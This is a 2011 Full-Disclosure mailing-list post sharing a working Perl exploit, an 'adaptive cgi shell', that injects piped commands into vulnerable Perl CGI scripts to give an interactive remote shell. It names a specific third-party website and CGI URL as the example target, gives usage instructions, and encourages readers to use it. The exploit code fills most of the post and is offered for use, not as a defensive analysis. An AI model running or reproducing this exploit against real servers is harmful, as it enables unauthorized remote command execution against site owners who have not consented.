Well shit. It did send twice. :( Now I look like a goof, haha. On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker < [email protected]> wrote:
> This works off the perl pipe read bug, you can just input the first and > second parts of the web address (with http:// included) and it'll drop you > at a shell. When using cd you must use the absolute path because I was too > lazy to do it the correct way. ;-). I know this is pretty easy stuff, it > works off those vulns that can just be exploited with a web browser, but > this gives you a shell. So have at it guys & gals! Had to resend because I > got some message about my attachment being blocked. Not sure if it really > was, though, I'll send again anyway. Hope this isn't spamming the list. =/ > > Site: > http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File > Useage: ./sublime.pl " > http://ultimategto.com/cgi-bin/statsedittext.cgi?filename="; > "&desc=Stat+File" > > Should work on most perl cgi scripts that are vulnerable to | read bug. > Please note, it's not a "real" shell, but almost everything works, except > things that won't go in one instance like cd-ing and env vars, etc. > > Play nice! > > --oxagast > > [CODE] > > #!/usr/bin/perl > > # adaptive cgi shell by oxagast > > use LWP::Simple; > $part1 = @ARGV[0]; $part2 = @ARGV[1]; > print "Making buffer...\n"; > for $bet (100..200) { > $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n"; > } > print "Exploiting...\n"; > $id = get("$part1\|id\|$part2"); > $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/; > print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n"; > $uid = $1; > print "$uid\n"; > while (0 == 0) { > print "\$ "; > $cmd = <STDIN>; > chomp($cmd); > if ($cmd =~ m/cd (\/.*)/) { > $dir = $1; > } > if ($cmd eq "cd ..") { > $dir =~ s/(.*)\/.*/\/\1/; > } > if ($cmd eq "pwd") { > $dirjunk = $dir; > if ($dirjunk eq "//") { > $dirjunk = "/"; > } > } > $dirjunk = "cd $dir\;$cmd"; > $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr"); > $cmdhex =~ s/(..)/\\\\x$1/g; > get("$part1\|echo -e $bettwo > /tmp/buff\|$part2"); > $backjunk2 = get("$part1\|cat /tmp/buff\|$part2"); > @backjunk = split("\n", $backjunk2); > get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2"); > get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2"); > $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2"); > @backjunk_split = split("\n", $backjunk_as); > $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2"); > $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m; > $thismanylines = $1 - 1; > for $junknum (0..scalar(@backjunk_split)) { > for $fuzz (10..100+$thismanylines) { > if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) { > $middle = $1; > @backjunk[$junknum] =~ m/(.*)\Q$middle\E/; > @backjunk_split[$junknum] =~ s/$1//; > @backjunk[$junknum] =~ m/\Q$middle\E(.*)/; > @backjunk_split[$junknum] =~ s/$1//; > print "$backjunk_split[$junknum]\n"; > } > } > } > } > > [/CODE] >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
